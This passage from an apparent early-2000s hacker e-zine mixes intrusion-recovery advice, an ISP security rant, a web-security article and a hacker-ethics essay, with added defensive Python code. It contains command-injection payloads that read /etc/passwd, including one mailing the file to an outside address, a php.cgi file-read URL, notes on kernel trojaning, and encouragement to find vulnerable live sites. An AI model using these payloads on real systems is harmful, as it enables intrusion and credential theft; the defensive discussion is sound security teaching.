checking, and it has been known to help in recovery.
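The three checks described above (the SUID inventory, the UID-0 entries in the passwd file, and the checksum compare against what the vendor shipped) gathered into one script, as an added example that is not the author's code. Every input is constructed inline so it runs offline: a `find / -perm -4000 -ls` style listing with the `.bash` entry from the text, a baseline of SUID paths recorded while the box was clean, the two passwd lines shown above, and a hypothetical vendor manifest of SHA-256 digests with in-memory "file contents" standing in for the binaries. The paths, digests and file bytes are all made up; on a real host you would feed it the actual find output, /etc/passwd, the vendor's checksum list and the files on disk.

```python
import hashlib

# Constructed `find / -perm -4000 -ls` output; the last line is the kind of
# thing the text warns about (root-owned SUID shell in a home directory).
FIND_LS = """\
 20142   36 -rwsr-xr-x   1 root     root        35168 Feb  3  2000 /bin/su
 20201   20 -rwsr-xr-x   1 root     root        18900 Feb  3  2000 /usr/bin/passwd
 81233  420 -rwsr-sr-x   1 root     root       426980 May  9 01:00 /home/digi/.bash
"""

# Constructed baseline: the SUID paths recorded while the box was still clean.
SUID_BASELINE = {"/bin/su", "/usr/bin/passwd"}

# Constructed /etc/passwd carrying the UID-0 backdoor account from the text.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
digi:x:1000:1000:Digital Ebola,,,:/home/digi:/bin/bash
digi2:x:0:0:Digital Ebola,,,:/home/digi:/bin/bash
"""

# Hypothetical vendor manifest (path -> SHA-256 of the shipped binary) and the
# bytes "found on disk"; telnetd has been replaced, sshd is missing entirely.
_CLEAN_TELNETD = b"clean telnetd build (constructed)"
_CLEAN_IDENTD = b"clean identd build (constructed)"
_CLEAN_SSHD = b"clean sshd build (constructed)"
VENDOR_MANIFEST = {
    "/usr/sbin/in.telnetd": hashlib.sha256(_CLEAN_TELNETD).hexdigest(),
    "/usr/sbin/in.identd": hashlib.sha256(_CLEAN_IDENTD).hexdigest(),
    "/usr/sbin/sshd": hashlib.sha256(_CLEAN_SSHD).hexdigest(),
}
ON_DISK = {
    "/usr/sbin/in.telnetd": b"trojaned telnetd (constructed)",
    "/usr/sbin/in.identd": _CLEAN_IDENTD,
}


def suid_inventory(find_ls_output):
    """Map path -> mode string for every entry of a `find -perm -4000 -ls` listing."""
    found = {}
    for line in find_ls_output.splitlines():
        parts = line.split()
        if len(parts) < 11:          # inode blocks mode links user group size M D T path
            continue
        found[parts[-1]] = parts[2]
    return found


def unexpected_suid(find_ls_output, baseline):
    """SUID files not in the baseline, plus any SUID file under a home directory."""
    return sorted(path for path in suid_inventory(find_ls_output)
                  if path not in baseline or path.startswith("/home/"))


def uid0_accounts(passwd_text):
    """Every account with UID 0, in file order; anything besides root is suspect."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0":
            hits.append(fields[0])
    return hits


def verify_checksums(manifest, files):
    """Compare SHA-256 of each file's bytes against the vendor manifest.

    Returns (mismatched, missing): paths whose digest differs from the
    manifest, and manifest paths with no file present at all.
    """
    mismatched, missing = [], []
    for path, expected in manifest.items():
        data = files.get(path)
        if data is None:
            missing.append(path)
        elif hashlib.sha256(data).hexdigest() != expected:
            mismatched.append(path)
    return mismatched, missing


def autopsy_report(find_ls=FIND_LS, baseline=SUID_BASELINE, passwd=PASSWD,
                   manifest=VENDOR_MANIFEST, files=ON_DISK):
    """Run all three checks and collect what needs a second look."""
    mismatched, missing = verify_checksums(manifest, files)
    return {
        "unexpected_suid": unexpected_suid(find_ls, baseline),
        "uid0_extra": [acct for acct in uid0_accounts(passwd) if acct != "root"],
        "checksum_mismatch": mismatched,
        "checksum_missing": missing,
    }


if __name__ == "__main__":
    for key, value in autopsy_report().items():
        print(f"{key}: {value}")
```

The SUID baseline is the part that has to exist before the intrusion: a list taken from a clean install, kept off the box, is what turns "is this SUID file normal?" from a judgement call into a diff.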

Now, if you have had a real professional come into your machine, then I can
honestly say that you may never find all the backdoors. I do not mean to kill
off your hopes of a recovery, but there are some out there that have true
finesse. I'll give you an example. Cracker comes in the box via a public
exploit, just as any kiddie. He sees this system as one to keep. He does not
modify a web page, he does not packet from the box. He wants to keep his
access, to be the ghost in the machine. He then trojans the kernel.

Dear admin, I must ask: how well do you know your kernel configuration? Do you
REALLY know the modules that you are loading? You can do ANYTHING from the
kernel. End of story. I want to hide my processes, I want to become invisible.
I will make the kernel do what I want. An easy way to do this from a cracker's
standpoint is to install LIDS (if you are a Linux admin; if you are an actual
UNIX admin, similar tactics can apply). Yes, the Linux Intrusion Detection
System. This thing can hide processes, make files undeletable, and even monitor
modifications. LIDS can be used for as many evil purposes as good ones. And
most admins have never even noticed that their kernel has been recompiled and
their machine rebooted. You would think that admins would pay more attention
to their uptime, but there are ways of handling that too. Someone that can
write custom kernel modules can stay in your machine for as long as they wish.
Or at least until you recompile your kernel. Which means, after your
intrusion, a kernel recompile is a must. The heart of your operating system
has complete control; if the cracker controls your kernel, and knows how to
manipulate it, you are going to be fighting him for a long time. If you even
realize he is there.

OPTION #3

Setting up booby traps can be fun. It can also give you a good deal of
information. I am not talking about buying a pre-built "honey-pot". I am
talking about rigging the system to where you can watch your intruder. See
what he is doing. See where he is coming from. I will talk more about what you
can do for performing an autopsy in a moment. For now, let's concentrate on
what you need to know to be able to get to that point.

The first thing is isolating what the intruder has done: assess the damage.
Don't fix the problems, just write it all down. You must make it appear that
you don't have a clue that he is there. Now, the trick to watching him is to
work around what he has done. If he has not messed with your login service,
you will be able to hide a ttysnoops server. Once he is logged in, you can
watch his terminal session in real time. Chances are, he has rigged the logs
to wipe themselves after each logout. Start another log daemon, and make it
look like a service that is meant to be on the system. The cracker will most
likely not notice. Log everything he does. Install a sniffer, hide the process,
and log that too. This brings me to the next section, doing the actual
tracking.

TRACKING

You are now watching your server closely for anything out of the ordinary.
You see the cracker log in. You are watching his every movement. What do you
do? The first thing is to see where he is coming from. Is there a DNS reverse?
Or is it an IP? Does the IP reverse? In most of these situations, most admins
do not know what to do beyond a simple nslookup, and if the IP does not
reverse, the admin thinks that it's hopeless. Not so. You can perform an ARIN
whois. ARIN is the American Registry for Internet Numbers. They are the people
in charge of assigning IPs and they work closely with other agencies around
the world that perform that same function. If your attacker's IP will not
reverse, go to ARIN (http://www.arin.net) and look up the IP. It will come
back to the provider of that IP, and sometimes even an individual. At this
point, you may call these people and ask them who is in charge of that IP. If
you are suspecting a break-in, most providers are happy to help you out any
way they can, short of giving out personal information. You can then go from
there to contacting the admin of that system, to see if it's an actual user on
his system, or maybe he has suffered a break-in as well.

For IPs that do reverse, you can get the contact information of the domain
that is being utilized thru a whois with network solutions. Generally, the
contact of the domain will have some clue to who is using that machine, and
you will be able to compare notes if they have had a break-in as well.

Another thing you can do, if you were blessed with a web defacement, is to
check the web defacement mirrors. Chances are, if they hit you, they hit
others as well. You can then call the other people that had break-ins and
compare notes. Crackers that do web defacements are often very blatant about
who they are. A search on metacrawler or another popular search engine will
often yield interesting information. Maybe even point you to a home page with
contact info! Maybe the attacker IRCs. Most likely he is IRCing from his home
machine. Be advised, IRC is a very anonymous medium. Just because someone says
they are someone does not mean they are that person. It is worth checking out,
but please realize that IRC is not true to life.

Things you can do to make your autopsy go better...

I have already stressed the importance of backups. Any admin worth his title
knows to back his data up. Another thing you can do is use a loghost in
addition to logging locally on your machine. A loghost is wonderful. It
basically allows your machines to be penetrated, and yet you still have a full
account of the connections. Make your loghost as close to unbreakable as you
can. Do not run any other kinds of services on this box. Ideally, this machine
will be local, so you will not even have to run telnetd. You can rig a cron job
to back up your network's logs to tape every night, or even better, back them
up via CD burner. You will thank yourself later. Keep in mind, your logs are
only good up to the point the syslogd is killed.

You should make it policy to log every event on the system, no matter how
small. It will develop a sense of timing. If timings are wrong on your daily
events, either you have a malfunction or you have an intruder. There are
kernel modules available on the Internet that allow you to log every command,
regardless of shell, thru your kernel. Installing this and logging to a remote
host is very effective for keeping your system monitored properly. Install
Tripwire, or a similar tool (Tripwire has its flaws), and keep its database
updated. Watch for little changes. Everything you watch and log now will make
your life easier in the event of an intrusion.

CONCLUSION

I see news reports of a hacker that is caught and fined 250,000 dollars. This
is the supposed cost of restoring the system. This is outrageous. The higher
the dollar amount, the longer the hacker goes away to prison. The sentence can
be longer for hacking a machine than it is for murder. Have we as a society
decided that a Sun Enterprise 3500 is more important than a human life? Yes,
hacking is wrong. So is murder. Taking a human life should be more of a charge
than the taking of a server. It does not cost thousands of dollars to replace
data. It does take time. It does take work. I can have no sympathy for a
person that is too ignorant to back their data up. After all, are you going to
blame a hacker for a hardware malfunction? Before you go condemning all
hackers for your intrusion, please realize that I could not have written this
text without intruding on machines at one point in my life. There will always
be someone out there with more skill, or that has a piece of knowledge that
you don't. Accept it; it is the reason we got into computers in the first
place. If you are recovering from an intrusion, all you can do is learn from
it, and become a wiser person. You might get the hacker in the end, you might
send him to jail, but he is one of many. There will always be people out there
that can get in. Some suggestions so you do not become a statistic: watch your
distro/flavor's homepage for security updates. Watch bugtraq and securityfocus
and any other security site possible. There are people that develop new
vulnerabilities every day. Watch out for these, and adjust your policies
accordingly. Read about intrusion detection systems and use them. And if you
do have an intrusion, don't just blame the hacker and don't just blame
yourself. It's a learning experience, not a very fun one, but you will live
thru it, and perhaps in the end teach someone else how to get thru it.

EOF

/* The author did not get 0wned to write this :P */


[One Large ISP]==========================================[anonymous@legions.org]

One large ISP.

I work for a large ISP that we will call 'BSFISP'. I will cover the
tactics of this company and its all-around shitty approach to business. We
will cover all of the following items:

- Company disaster 'recovery' plan
- Company security including Physical and Network

We will start out with the company's approach to disaster recovery and
backup, or lack thereof. Let's say that you are the proud owner of a
nationwide ISP with a very large customer base, yet in the name of profit
you have elected to ignore some things like a working UPS, working power
transfer switch, network redundancy, etc. Let's say now that the unthinkable
happens: you lose power in the middle of peak hours. You get a call from
your NOC staff, who are using their personal cell phones because you are
too cheap to provide backup power on the phone switch. You drive into the
office to figure out what you should do because you have never taken the
time and money to come up with a procedure for a disaster. Your power
transfer switch is located in a room that only one person (the grounds
keeper) has a key to. But that does not matter because you did not invest
in a redundant power transfer switch and your only link to the outside
world has burst into flames. What to do now? Figure out how to save your
own ass. Spin control is the name of the game. You get one of your smarter
employees to gain access to said room so that you can figure out how to
get the power back on so that you can get phones working (you are dreading
the employee phone bill because they are all using their cell phones to
call your partners). The very expensive UPS that you got at a discounted
price that should have powered the building for an hour has died after only
10 minutes of use; the chillers have toasted. This is a nightmare. Now what
do you do? START BLAMING PEOPLE! That's right, it's not YOUR fault. It must
be the NOC staff; they were the only people in the building when the local
power company fucked up the grid! They must have done something to provoke
this. Blame them. Now to deal with your partners... Call a company meeting
and come up with a nice white lie that will not allow you to lose
face. This is the approach that my company took when we faced a power
outage. The problems we faced were not fixed. Anything that broke was
bandaged back together and it was business as usual. Currently we have
one broken generator, a UPS that will only last 10 minutes (hardly enough
time to shut down 50 HP Netservers, 3 Sun Enterprise 3500s, many Cisco
routers and countless other servers). We lost 10 pieces of equipment from
this because we do not run surge protection into the equipment.
It was GREAT, and NOTHING has changed. We did not tell our
partners and customers what happened.

Company security and why it costs too much to protect customer credit card
information:

That's right folks, at this ISP anyone can access our
accounting system with VERY little effort thanks to a web based interface
that the systems admins think is SO spiffy. "Well it is password
protected. So that makes it secure." That would be true in most cases;
however, with this company we have elected to give moronic passwords to
employees like this:
Employee Name: John Doe
Employee Username : jdoe
employee Password: jdoe
If you are able to guess an employee's name (not hard, there is a list on the
website and yes.. the CEO's password is his username) you have access to
EVERYTHING on the network. If you get a NOC person's username you are now
able to repoint domains, delete the entire accounting system, delete the
entire DNS/DHCP database, reconfigure tftp files for the routers and cable
modems. "Well if I do that they will know it was me because they HAVE to
keep logs!" Not to worry, at BSFISP we do not believe in logging
anything. It takes too much disk space. Did I mention that the firewall we
have is about as effective as a screen door on a sub? The Russians tried
this and look where they ended up.. Did I mention we run the ENTIRE
operation on NT servers? No.. they are not patched.. yes IIS is
exploitable on these machines in about 100 different ways. You can also
access our ticketing system from the outside world (did I tell you that the
script does not check for illegal characters? so that means in the input
boxes you can type "bla ; cat /etc/passwd" and on this unix machine it
will OUTPUT THE PASSWD FILE TO YOUR SCREEN!) fucked up ehh? We have a very
insecure VPN as well.. but why bother breaking that when it does not give
you access to anything that you can't access from the outside world
anyway. The only thing it is used for is people on the inside of the
network needing access to things outside the network (that's backwards
isn't it?) Anyway you get the point that security is a joke.. oh
yeah.. the mag locks on the doors don't work. And no, the company does not
plan on fixing this. They think that they will never get hacked..

So you think you want a job with this company? It is not hard.. however if
you have a clue do not plan on having an easy life with this company; they do
not like employees that think. It's bad and it makes the higher up
management look bad. Don't even think about pointing out anything that is
fucked up on the network.

Anyway I grow bored of typing so... there..


[Simple HTTP Security]===============================================[Phriction]

Web based security is probably one of the biggest problems on the internet
these days. Everyone wants their own web site or to run their own web site
and do so with little or no knowledge about their security. In this article
I'm going to talk about basic web security.


DIR LISTING

Directory listing is a major problem on lots of websites. When the
webmaster or whoever is running the website allows Dir listing I can view
files and folders in the directories just as if I were to type ls -a.
Problem is people usually upload things to their website they don't want
people to see, or have stuff on their website that can lead to possible entry.
For example, I was looking at a site once that used php scripting and had Dir
listings, which allowed me to find a backup copy of the php code which in fact
was used as a frontend to a SQL database; in the code were login/passwords to
the SQL database and the box. I usually like to check Dir listings on /cgi-bin/
when surfing the web just to see how many sites allow it, and surprisingly
enough sites do to keep me checking. The cgi-bin is probably one of the most
dangerous places to have Dir listing because lots of people upload cgi scripts
or files even though they never use them, and in most cases httpd is suid
nobody or root, which means it could execute its commands with root privileges.
So, for example, an old exploit of php.cgi uses it to retrieve /etc/passwd by
entering the URL http://www.target.com/cgi-bin/php.cgi?/etc/passwd into your
web browser. Lots of people don't write their own cgi scripts, they usually
just use one off the internet, so by searching for these files in a script
archive you can possibly exploit the script after reading the code.

FUN WITH FORMS

More and more web pages these days use forms for basic information or
for anything; the problem is this: if the script used to parse the form doesn't
filter out arbitrary characters you can use this to your advantage. For
example, the cgi script AnyForm doesn't parse out any arbitrary characters
entered before it invokes a shell. So we enter into the form
<input type="hidden" name="recipient" value="phric@legions.org; cat /etc/passwd;/usr/lib/sendmail -t phric@legions.org">
then submit the form. Now since the cgi invokes a shell, the ; is used to
identify the end of a command string, so in place of cat /etc/passwd; can be
placed any_command; for the script to execute on the server. By viewing the
source of the form and seeing which script it is using to parse the form you
can search for the script in archives. View the source and see if it's
possible to exploit it.
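The AnyForm bug described above, as an added example (this is not Phriction's code and not AnyForm's): the vulnerable shell-string pattern beside a hardened handler that allow-lists the recipient field and passes an argv list so no shell ever parses it. The function names and the address grammar are assumptions for illustration; nothing is executed, the commands are only built and counted.

```python
import re

# Payload quoted in the article above, used here only as test input.
INJECTED_RECIPIENT = ("phric@legions.org; cat /etc/passwd;"
                      "/usr/lib/sendmail -t phric@legions.org")
SENDMAIL = "/usr/lib/sendmail"


def build_shell_command(recipient):
    """The vulnerable pattern: the form field is spliced into a string
    that the CGI then hands to a shell via system()/popen().  Returned
    here instead of executed, so it can be inspected."""
    return "%s -t %s" % (SENDMAIL, recipient)


def shell_command_count(command):
    """Count the commands a POSIX shell would run for this string: one
    more than the number of ';' separators outside quotes.  (Pipes, '&&'
    and backticks are other separators this simple check ignores.)"""
    count, quote = 1, None
    for ch in command:
        if quote:                      # inside '...' or "..."
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            count += 1
    return count


# Allow-list grammar for a plain address: local part, '@', dotted host.
# Shell metacharacters (; | & ` $ and whitespace) can never match it.
_ADDRESS = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def validate_recipient(recipient):
    """Return the recipient unchanged if it is a plain address, else raise."""
    if not _ADDRESS.match(recipient):
        raise ValueError("recipient is not a plain e-mail address")
    return recipient


def recipient_is_accepted(recipient):
    """True if the hardened handler would pass this field on to sendmail."""
    try:
        validate_recipient(recipient)
        return True
    except ValueError:
        return False


def build_argv(recipient):
    """The hardened pattern: validate, then build an argv list.  Handed to
    subprocess.run(argv) with shell=False, the field is a single argument
    to sendmail and no shell ever sees the ';'."""
    return [SENDMAIL, "-t", validate_recipient(recipient)]


if __name__ == "__main__":
    cmd = build_shell_command(INJECTED_RECIPIENT)
    print("vulnerable form would run %d commands: %s"
          % (shell_command_count(cmd), cmd))
    print("hardened form accepts payload:",
          recipient_is_accepted(INJECTED_RECIPIENT))
    print("hardened argv for a clean address:",
          build_argv("phric@legions.org"))
```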

HASTALAVISTA.COM

Well, as some of you know, altavista.com can be a bored computer user's
best friend, or script kiddie central, but maybe the more people who hear
about this the more aware the public will be of vulnerabilities in webpages.
I can already hear some of you right now saying the exploits I named in this
file are out of date and how most forms these days parse out the values of
forms, but I sit here and beg to differ. Go to http://www.altavista.com and
for the parameters for your search type in, for example, +/cgi-bin/php.cgi
and what shows up is probably some security paper on how bad it is to have
php.cgi, but it also returns websites running it. Kinda disgusting eh? I hear
the word 0-day being used more and more but it's sad when a 365-day++ exploit
works, and I'm talking .mil sites here also. Try it for yourself if you're
bored and want to make a site go Hasta la vista.

PHRICTION HTTP SECURITY SCANNER PRE-RELEASE VER 0.5

Well I know you all use Whisker for your HTTP scans, but what about those of
us who use windows boxes? Well, we could run a perl interpreter, but come on,
the average script kiddie doesn't even know what that is. So thank me, I ported
a version of my Pre-Release HTTP scanner for windows, simple and easy to use;
a VB GUI interface is soon to come for the command line inept among us. This
version just searches for exploitable files, it doesn't exploit them yet. Yes
you will have to go search bugtraq on how to exploit them. Read the README to
learn the rest, thank you.

Scanner available at http://phriction.sk1llz.net/programs.html
Bugs, Comments, Suggestions phric@legions.org


[Hacker Paladins]======================================================[Raschid]

/* Editors Note: Many of our readers have expressed a certain need to, well,
express themselves. Not everyone can talk tech all the time, but they certainly
do vent through their writings, which has brought a change of thinking
to the Keen Veracity staff. KV has primarily been a technical zine, a forum to
express ideas based on technology. We believe that in order to reach this point,
one must take a stride through some other areas in order to stimulate thought
processes. We hope to maintain a level of technical savvy, but we would also
like to let some others stretch that expertise into something that merges tech,
mind and soul. Hopefully, we may be able to stretch our intellects through the
wanderings of personal expression.
*/


"Behold a broken world, we pray,
Where want and war increase,
And grant us, Lord, in this our day,
The ancient dream of peace.

No force of arms shall there prevail
Nor Justice cease its sway;
Nor shall their loftiest visions fail
The dreamers of the day."


-"Behold a Broken World"; Christian hymn


Of what benefit is there in fighting darksiders? Of what gain is
there in thwarting their advances into the souls of our people? What use
is there in resisting this element amongst us which rejects honor, which
rejects knowledge, which rejects curiosity; which rejects all that is
good, and clean, and noble and yet allows baseness, corruption and
dishonor to flow so freely amongst the hearts and minds of our people? O
my brothers and sisters in the underground, is this not a disgraceful
thing? Through this we have found dishonor and ill favor among the other
people of the world, that our name is considered a curse on the lips of
all who utter it. Our name is that of the wolf on the lips of the
digital lambs.

And few care.

Few it seems, give a jolly damn about the consequences of their
action. Gone are the days of technical competence to achieve amazing
results. Gone are the days of literature exclaiming the hacker as a good
guy, someone who might just be alright, who is not necessarily the
harbinger of doom, the demon of cyberspace. It's been suggested, half
seriously, that the Anti-Christ just might be himself a hacker. And what
of it, my friends? In our post-modernist society, where pop-culture has
the attention span of an infant, it would seem plausible that such
concepts as love, loyalty and virtuous living play a role in their lives
only insomuch as it fails to inconvenience them. If our current age of
people cannot abide such concepts, how can the hacker underground? For
surely, we are nothing but the cybernetical extension of our
surroundings.

What has Zarcae to offer that your television does not? We offer
the concepts of love, of ennobling our hacker brethren with those
virtues which have long disappeared from the mainstream culture. There
are two conceptions of the world of cyberspace floating about in the
common parlance. One is of the Wild West, where cigarette champing
cowboys roamed over an anarchistic frontier, where the only law was laid
down by whomever had the fastest gun and most ammunition. What few
authorities there were of true law and order were jokes typically,
facsimiles of those virtues. The second main idea of cyberspace (and the
less popular one) is that of the medieval era, with the monarchy replaced
instead by a technocracy of sorts. That is to say, loosely,
that the more technical ability a person possesses, the higher in the
social order of his relative society he will be. A main thesis of Zarcae
holds this second main ideal of cyberspace to be the most accurate, and
charges that hackers are the equivalent of knights in the Middle Ages.
With our skills at intrusion, and the ability to wreak concentrated,
disciplined havoc among computer systems, with said skills even
possessing the ability to wreak chaos outside of cyberspace, it could be
said that the possession of such skills is the equivalent, literally, of
the martial skills of those historic knights.

The problem with our analogy is that it begs for complicated
technical expertise. This is no longer the case, as lamented by Erik
Bloodaxe in the last Phrack editorial he did as editor in chief of it a
few years back. He commented that as the level of technical competency went
down, the quality of hacker went down in direct proportion, and the
quantity of people ABLE to pursue violent action in cyberspace rose
inversely. This is to say, still following our analogy, that as the
level of military training needed went down, and as the level of
technology rose so that even fools could fight skillful battles with
rudimentary muskets and such , the quality of knights went down (where
"quality" is equated with "ethicality") in direct proportion, and the
amount of people able to engage in battle rose inversely.

These are simple questions, OBVIOUS questions, but ones rarely
asked or answered. Most people fail to consider the squires and would-be
mercenaries of the underground (i.e., script kiddies, "warez" pirates)
as knights, but this does not necessarily fail to distinguish them from
those skilled cybernetic knights who have wholly sold their skills to
the pursuit of profit or power, whom we call "darksiders". These hackers
have given away their talent, prostituted their ability in the cause of
baseness and immorality. They have betrayed their cultural legacy, and
as such, pose a direct threat to us all.

What then, does Zarcae propose to do about the mercenary class of
hacker which has sprung up in the underground? How do we propose to
counter-act the sea of immorality plaguing our people? What to do?
Zarcae proposes to arise two new ideals of hacker. As I have stated, a
basic Zarcae tenet is to hold hackers as knights; what is needed is to
raise that standard further, to bring home the concept of the 'paladin
hacker', which is to say, the concept of the hacker who fights with
righteousness and the good on his side, bringing said lost virtues back
to his people. To such a hacker, there is no enemy insurmountable, no
evil so great as to not be overcome. Why, then, is our task called
glorious? Because it is the stirring of the human soul against tyranny,
it is the ringing cry to battle which lies in the hearts of all people,
the noble love and fierce loyalty all hold towards family and people. We
are protecting our own. The second concept is that of the 'scholar
hacker'. Too long has the underground languished under a shadow of
ignorance. Too long has communication flowed in tiny spurts among the
elite, so that the gifted beginners in the underground gain knowledge to
join their princely ranks only TO finally join as those jaded members
they formerly swore never to become. Jaded, and incapable of rendering
good works unto their fellow men and women as their high status
honorably requires through moral obligation. Zarcae proposes the
establishment of a hacker intelligentsia. We need an intellectual elite,
capable of fielding the hostile outsider lashings of a world which
misunderstands us, which fears and reviles us. We need hacker
apologeticists, who can reasonably combat these arguments against the
very existence of our people.

There are scattered individuals who fight against this tide of
incompetence so dominant in our people in the underground today. It is
to be hoped that Zarcae will only be the first of such groups to
encourage honest debate and intellectual argument among the underground,
that others may follow, and so allow their lights to shine even greater
than ours. We are the first, but the first is not necessarily the
greatest, and in time, I feel, there will come others whose light will
shine so much as to eclipse Zarcae's very memory. As to that time, I
feel little sorrow, since we will have accomplished our purpose in
igniting the passions of those intellectual descendants. Let our memory
pass away into Time, as we ought to have no need of the vanities of
mortal men. Let our deeds stand as our legacy, aside from vain words.

Combined with the holy righteousness of the paladin, and the
thoughtful pondering of the scholar, we come upon the question as to
central motivation. What WILL be the overriding passion to which will
give rise to all the actions of those who follow the Ethic? The answer
to that is: Love. It is love of our fellow men and women which will
inspire us to our acts of daring in cyberspace. It is through love that
we will graciously accept the persecutions that the federal authorities
and our mis-understanding brethren in the underground will render
against us, and it is through love that we will inspire them to quit
their heinous acts, lay down their swords of injustice, and follow us.
Without love, all these virtues of justice, nobility, honor, would be
useless. What use is the dispensing of the actions of goodness, without
it being tempered with the love of the people involved? There is no
goodness where love is not present. The Ethic forces our behavior
outside of cyberspace to reflect our actions inside of it. The hacker
who has spent his nights away from the modem carousing, drinking,
cursing has no place in the hacker paladin ranks; how could he condemn
the darksider when his soul is half there already?

"Love must be sincere. Hate what is evil; cling to what is good."
-Romans12:9

Without love, the eloquence of the greatest prophets ring hollow.
There is no urge to follow noble ideals, only the lust of profit, and
for power. Without love, the great deeds of virtuous men seem empty, and
devoid of that noble spark, crumbling eventually, and sinking back again
into the pit where evil waits patiently for the fall of all things,
noble and un-noble alike.

"So justice is driven back
And righteousness stands at a distance;
Truth has stumbled in the streets,
Honesty cannot enter.
Truth is nowhere to be found,
And whoever shuns evil becomes a prey."

-Isaiah 59:14-15

I have talked in the past of hackers who give lip-service to the
ideals we express, but do nothing. How foolish are they! The ideals we
express should be as a fire in your blood, constantly upon the brain,
and a sword upon your tongue, to go forth and deliver your messages of
goodness to the entire hacker community, that we may reform our manner,
and so become true paladins and knights, and no longer mercenaries or
bandits as we have fallen to.

"What good is it, my brothers, if a man claims to have faith but no
deeds? Can such faith save him? Suppose a brother or sister is without
clothes and daily food. If one of you says to him, 'Go, I wish you well;
keep warm and well fed,' but does nothing about his physical needs, what
good is it? In that same way, faith by itself, if it is not accompanied
by action, is dead. But someone will say, 'You have faith; I have deeds.'
Show me your faith without deeds, and I will show you my faith by what I do.
You believe there is one God. Good! Even the demons believe that and
shudder."
-James 2:14-19

As such, do we find later in James, another passage about wisdom
and deeds. For a man or woman to be considered wise by Zarcae standards
is not much; it is only to live as a person of faith in the Ethic, and
to show that Ethic through their actions to others, both in cyberspace,
and out. Such a man or woman need not even be a hacker themselves, for
surely my friends, that I am not. I have adopted the hacker underground
as my own people, and would hope likewise to have been adopted, but I
myself am not of the same stock as you, I have not learned the same
tenets, have little knowledge of the same technology. This is not to
say, friends, that I do not desire it. However, I have found it hard to
find such knowledge, and wish readily enough for teachings, as I suppose
many others of good quality do. This is somewhat what I mean by an
established intelligentsia. It is as of yet too difficult for the gifted
of our people to learn. We must establish some method to raise our
people out of ignorance, raising them in knowledge with the Ethic, so as
to form a community of hacker paladins and scholars.

"Who is wise and understanding among you? Let him show it by his good
life, by deeds done in the humility which comes from wisdom. But if you
harbor bitter envy and selfish ambition in your hearts, do not boast
about it or deny the truth. Such wisdom does not come down from heaven
but is earthly, unspiritual....[f]or where you have envy and selfish
ambition, there you will find disorder and every evil practice."
-James 3:13-16

What then, is the quality of those who would follow the Zarcadian
Ethic? It is simply to be loving of all, foe and friend alike. It is
nothing to love your friends, even the worst of your fellow men and
women manage that. If you can curse the feds and love your friends, what
is that? You have failed in the Ethic, and are unworthy to be counted
among the ranks of the paladins. Your sin describes you, and you have
shown by your deed that you are not of our kind. Therefore, to love your
foe is not to be submissive to them. They cannot understand their error
so long as they labor under the clouds of their ignorance and lusts of
power and social status. You must teach them as you can the errors of
their ways. Failing that, you must hand them over to their respective
justice systems, in the hope that such will correct their ethic
troubles. Many among you will be puzzled by this, but it remains true.
The federal authorities, though they will certainly persecute you, are
nonetheless your allies in your endeavors. They abide by the same ideals
largely, that you do. Justice is the basic idea of our modern legal
system. Ineffectual or not, it is all we have to go by.

Another reason remains for our assistance of the federal
authorities of their capturing of the most malignant of the darksiders:
they simply are overmanned. It is estimated that the FBI would have to
spend every day, of every year, with every agent, just to keep barely
current with computer crime. Currently, the Computer Crime Unit of the
FBI and the computer crime specialists of the Secret Service is
ludicrously small, and inept at any efforts to stop the waves of attacks
that darksiders launch daily on the digitally innocent. As paladins, we
owe it to these authorities to help them in their quest.
I spoke earlier of envy and ambition. Such is to be avoided at all
costs by the followers of the Ethic. I myself am the leader of Zarcae
only by default of having created the group; no doubt there are others
more eloquent, more impassioned in their speech, more technically
competent to lead than I; surely there are others beside whom my
knowledge and talents are as those of a child. In the absence of such
characters, I believe it my duty to lead the group. Envy is horrible for
paladins; why be jealous of a brother or sister who is better
technically able? This is foolish. The better thing is to ask assistance
from that person on what ails you technically, so that you may better
serve others through your skills. If they are of little help to you,
what of it? There are thousands of areas in electronics, computers, and
such, where you could otherwise occupy and specialize. Even those who
know nothing of hacking at all are useful in their writing talents; they
may be hacker ethicists, who argue for a logical philosophical basis on
which we may rest our actions firmly.

With all that said, welcome to the coming Revolution, friends, and
God bless.

-Raschid
*Founder of Warzael Zarcae


[PERL Site Verification]================================================[Crater]

Howdy, aight aight.. give me a break, I am a Texan. Anyways... I was asked
to submit a few of my programs (scripts and anything else I could come up
with on short order) for the ezine. Now, don't get me wrong, I am by no means
a guru in programming. I am rather a jack of all trades. And I am
always very keen on modifying others' code to suit my purpose. Don't
reinvent the wheel is my motto.

I leave the real stuff for the more technical. LOL :)

Now, I think my first program should be something that will actually be of
some use. I know you got a lot of sys admins out there that already know
a lot of what I am about to show you, but it is still useful.
But I am writing this for the new upstarts out there that are trying to get
their foot in the door. I use this perl script at work for a site
verification system. DigiEbola has since written another one
that works really well.. But, needless to say, I LIKE MINE!!! j/k.

Ok.. now the things you will need.

You will need the Net-Ping module, IO-File-Multi module. On a few systems
these should already be installed.. but, if not.. just surf on over to the
CPAN site and download them.. they are very very useful modules that will do
nothing but make your perl life easier. Now, enough talk lets get down to
what you came here for. What I am about to show you is by no means the only
way to script this.. its just the way I like it.. thats it.

Ok.. first an explanation. Where I work, we bring on data centers around the
world and a lot of times we have to retrofit the centers. In doing that,
we have a lot of systems at one time we have to make sure are actually there.
Now, I have been able to use fping and nmap, exscan and a lot of others that
do the same exact thing that this script does.. I just wanted one script
that does it all.. and that was real easy to set up on other systems to
run. So.. here we go.

#### Normal stuff here
#!/usr/bin/perl
########################
#Site Verification
########################
# Written by me Crater
#
# You can contact me at ddfelts@ultravision.net
# if you need help with anything.
#
########################
use strict;
use warnings;
use Net::Ping;

# so we can send multi prints using one call..
# so one print statement can go to different places.. just a time saver..
use IO::File::Multi;

# so we can do the port scan stuff
use IO::Socket;

# Declare our args ($ARGV[0] is the first argument; @ARGV[0] was a slice)
my $file  = $ARGV[0];
my $file1 = "alive.$file";

unless ($file) {
    print "Usage: $0 <infile>\n";
    exit(1);
}

# We want to use icmp packets here... (icmp pings need root)
my $host = Net::Ping->new("icmp");

# define our multi object
my $mult = IO::File::Multi->new;

# to stdout
$mult->open('>-');
# to our alive.#file
$mult->open(">>$file1");

# Open our data file.. should be just a plain ip file with
# ip number on each line.
open(INFO, "<$file") or die "Can't open $file: $!\n";
# put each line in an array
